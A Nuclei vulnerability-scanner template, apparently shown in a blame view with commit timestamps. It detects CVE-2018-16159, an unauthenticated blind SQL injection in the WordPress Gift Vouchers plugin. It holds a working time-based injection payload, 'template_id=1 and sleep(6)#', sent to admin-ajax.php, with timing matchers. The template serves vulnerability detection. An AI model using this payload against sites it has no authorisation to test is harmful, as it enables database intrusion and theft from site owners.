nuclei-templates/http/cves/2018/CVE-2018-16159.yaml

50 lines
1.9 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2018-16159
info:
name: WordPress Gift Voucher <4.1.8 - Blind SQL Injection
2023-03-05 13:42:10 +00:00
author: theamanrawat
severity: critical
description: |
WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-06 12:57:14 +00:00
remediation: Fixed in version 4.1.8.
2023-03-05 13:42:10 +00:00
reference:
- https://wpscan.com/vulnerability/9117
- https://wordpress.org/plugins/gift-voucher/
- https://www.exploit-db.com/exploits/45255/
- https://nvd.nist.gov/vuln/detail/CVE-2018-16159
2023-07-11 19:49:27 +00:00
- https://wpvulndb.com/vulnerabilities/9117
2023-03-05 13:42:10 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-16159
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.01247
epss-percentile: 0.83931
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:57:14 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: codemenschen
product: gift_vouchers
2023-09-06 12:57:14 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin,codemenschen
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- raw:
- |
@timeout: 10s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=wpgv_doajax_front_template&template_id=1 and sleep(6)#
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "images") && contains(body, "title")'
condition: and
# digest: 4a0a00473045022041da8934aef02c1d1921dd28d4740f84581635b25bacce8f4e9a8e52303a3672022100f24d15c54261799482bf921b35d233a0470b004afa0bfa6ddbeed750d8239037:922c64590222798bb761d5b6d8e72950